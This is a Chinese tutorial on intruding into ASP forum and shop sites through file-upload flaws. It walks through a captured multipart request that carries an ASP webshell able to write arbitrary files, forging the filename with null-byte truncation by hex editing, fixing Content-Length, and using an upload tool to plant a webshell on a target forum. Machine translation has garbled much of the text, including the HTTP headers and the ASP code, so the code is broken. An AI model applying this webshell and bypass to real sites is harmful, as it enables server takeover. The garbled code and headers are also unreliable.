asp上传漏洞入侵与扩展实例分析

{上载漏洞欺骗}



网络上有很多的应用,如上传漏洞,让我飞的整站程序,商场、购物中心、动态秋惠信的新闻系统等。本文主要介绍入侵真正的战斗和一些扩展利用上传漏洞。首先,我们需要在客户端和服务器之间传输的数据,并准备一个ASP木马准备上传。当然,成功是不可能的。我们要的是我们在middle.wsockexpert提交到服务器的数据通常是用来获取数据,因为有太多的数据如下发出:

邮政/论坛/ upfile.asp HTTP / 1.1

遗漏更多无用的信息

内容长度:1792
联系:保持活力
缓存控制:无缓存
饼干:aspsessionidqqtdtatd = nldnnhpdjeehofnfbagpojkn
----------------------------- 7d52191850242
内容配置:表单数据;名称=文件路径

uploadface
----------------------------- 7d52191850242
内容配置:表单数据;名称=动作

上传
----------------------------- 7d52191850242
内容配置:表单数据;名称=file1;文件名=E:木马 ASP 壳。ASP
内容类型:文本/普通

昏暗的objfso %> < %
<% %>昏暗fdata
昏暗的objcountfile %> < %
<错误%恢复为下% >
< %集objfso = server.createobject(脚本。FileSystemObject)%>
< %如果修剪(请求(syfdpath ))< >然后%>
<% fdata =请求(cyfddata )%>
< %集objcountfile = objfso.createtextfile(请求(syfdpath ),真的)%。
<% objcountfile。写fdata %>
<如果错误=0,则% % >
<% response.write > <字体颜色=红色> H2 >成功!< <字体> % >
<其他% % >
<% response.write >字体颜色=红色H1 > >!<
< %结束如果% >
<错误%。清除% >
< %结束如果% >
<% objcountfile。近% >
< %集objcountfile =没有%>
< %集objfso =没有%>
<% response.write ' <形式行动= '方法=后> %>
<% response.write保存消息<字体颜色=红> > D: 网络 x.asp < /字体> %>
<%响应。写> <输入类型文本名称= syfdpath宽度= 32 = 50 > %>
<响应%。写> > % >
%应答。地址来自%
<%=server.mappath(request.servervariables(script_name ))%>
<% response.write >
%>
%响应。写消息:%
<% response.write > <文本名称= cyfddata列= 80行= 10宽度= 32 > < /文本> %>
<% response.write > <输入类型提交值=天空!> % >
<% response.write > < /形式> %>

----------------------------- 7d52191850242
内容配置:表单数据;名称=名

E: shell.asp ASP木马
----------------------------- 7d52191850242
内容配置:表单数据;name =提交

上传
----------------------------- 7d52191850242 --

我们已通过的信息,将改为欺骗,主要的变化是:

1.content-disposition:表单数据;名称=file1;文件名=E:木马 ASP 壳。ASP

2.content-disposition:表单数据;名称=名

E: shell.asp ASP木马

3最重要的地方。内容配置:表单数据;在名称=文件路径应该被修改的值。我们修改uploadface shell.asp背后如何添加一个空字符用UltraEdit是编辑16进制的一个好方法, 0(因为这种性格也占了一个位置,所以我们第一次进入一个空间,然后UltraEdit(Ctrl + H 16进制转换模式)在20空间的变化00)。

4。另一个需要修改的地方是,这个句子内容长度:1792表示提交数据的字符数。

如果修改文件路径的值,这个长度1792也必须改变。一个字母或数字的长度是1。别忘了后面的空间。那是1。

{上载漏洞}


我们首先使用bug的祖先动网论坛的战斗。从原理上,你可以看到数据变化和包被切断,所以网络上有很多的工具。现在我们用老兵的上传工具直接简化复杂的步骤,只要几个数据被修改。让我们看看这个工具的界面一看,如图1所示:



图1老兵上传工具界面

我们说工具的使用:

在操作中,输入上载漏洞文件的URL:

在这里,我们以我们的入侵网络论坛为例,其中的行动:填写

饼干:在这里不要被抓到,因为这里的上传没有发现cookie哦。不,如果你填写它并按照提交按钮直接提交它是错误的!



图2上传成功提示

当点击提交按钮时,最好使用浏览器的访问,并计划将误报。我们使用浏览器访问。



图3可以看到上传是成功的。

下一步是写一个功能强大的木马来操作,不再深入。

{上传漏洞实战扩展}


不仅在移动网络中存在上传漏洞,网络中也存在很多漏洞。上传漏洞的原则是相同的。掌握后,可以根据程序代码自由发挥,让我们以乔的论坛为例,扩展上传漏洞的应用。
一个正常的用户登录的第一个迹象和上传页面,然后找到地址:--------------------------------------------------------------------------------

<表名为Form1的行动=行动= = =不管是依靠方法后多 /表单数据的内容类型>
<输入类型的隐藏价值=论坛名称= up_path >
<输入类型的隐藏价值= 200593075710 = up_name名称>
<输入类型的隐藏价值= jk_word名称= up_text >
<输入类型=文件大小= 40 = file_name1名称>
输入类型=提交值=单击上传名称=提交

--------------------------------------------------------------------------------

当你看到源代码时,你应该知道老兵们是如何上传这些工具以及我们应该如何填写的。
行动投入:



图4被设置为一个图表。

设置后,点击提交按钮,查看上传成功,打开浏览器查看是否成功,如



图5上传成功

到目前为止,我们已经成功地得到webshell,它是如此的简单。我们在思维灵活是非常重要的,同时也要善于发现系统是否有上传漏洞。当然,为你能做什么在得到webshell,你可以看到服务器和个人水平的安全配置。这里没有讨论。